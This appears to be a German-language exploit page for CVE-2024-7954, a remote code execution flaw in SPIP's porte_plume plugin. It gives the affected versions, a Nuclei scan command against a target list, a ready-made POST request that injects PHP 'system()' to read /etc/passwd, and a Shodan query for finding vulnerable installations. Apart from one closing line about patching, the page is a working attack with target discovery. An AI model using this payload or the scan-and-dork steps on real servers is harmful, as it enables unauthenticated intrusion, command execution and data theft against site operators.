
Exploit für CVE-2024-7954: Remote Code Execution im porte_plume-Plugin von SPIP. Enthält Nuclei-Scan-Vorlage und Shodan-Dork zur Identifizierung verwundbarer Instanzen.
Das porte_plume-Plugin, das von SPIP-Versionen vor 4.30-alpha2, 4.2.13 und 4.1.16 verwendet wird, ist anfällig für eine kritische willkürliche Codeausführung (RCE)-Schwachstelle. Dieser Fehler ermöglicht es einem entfernten, nicht authentifizierten Angreifer, beliebigen PHP-Code als SPIP-Benutzer auszuführen, indem er eine spezielle HTTP-Anfrage erstellt. Das Ausnutzungspotenzial ist schwerwiegend, da Angreifer bösartige Befehle auf dem Server ausführen können, was zu unbefugtem Zugriff, Datenlecks oder weiterer Systemkompromittierung führen kann.
##Nuclei Scan
kali@Dell:~/nuclei-templates-main/http/cves/2024$ nuclei -l targets -t /home/kali/nuclei-templates-main/http/cves/2024/CVE-2024-7954.yaml
Ein Beispiel einer manipulierten HTTP-Anfrage, die zur Ausnutzung dieser Schwachstelle verwendet werden kann, lautet wie folgt:
POST /index.php?action=porte_plume_previsu HTTP/1.1
Host: {{Hostname}} -> IP
Content-Type: application/x-www-form-urlencoded
data=AA_[->URL<?php system('cat /etc/passwd'); ?>]_BB
POST-Anfrage ist an die porte_plume_previsu-Aktion der SPIP-Datei index.php gerichtet.system() verwendet, um einen Befehl auszuführen (in diesem Fall cat /etc/passwd), der den Inhalt der Passwortdatei liest.system()-Funktion könnte ein Angreifer beliebigen PHP-Code auf dem Server ausführen, was zu schwerwiegenden Konsequenzen führt.Um potenziell anfällige SPIP-Installationen zu identifizieren, kann die folgende Shodan-Suchabfrage verwendet werden:
app="SPIP"
Diese Schwachstelle unterstreicht die Bedeutung, Software auf dem neuesten Stand zu halten und robuste Sicherheitsmaßnahmen zu implementieren, um sich vor Ausnutzung zu schützen.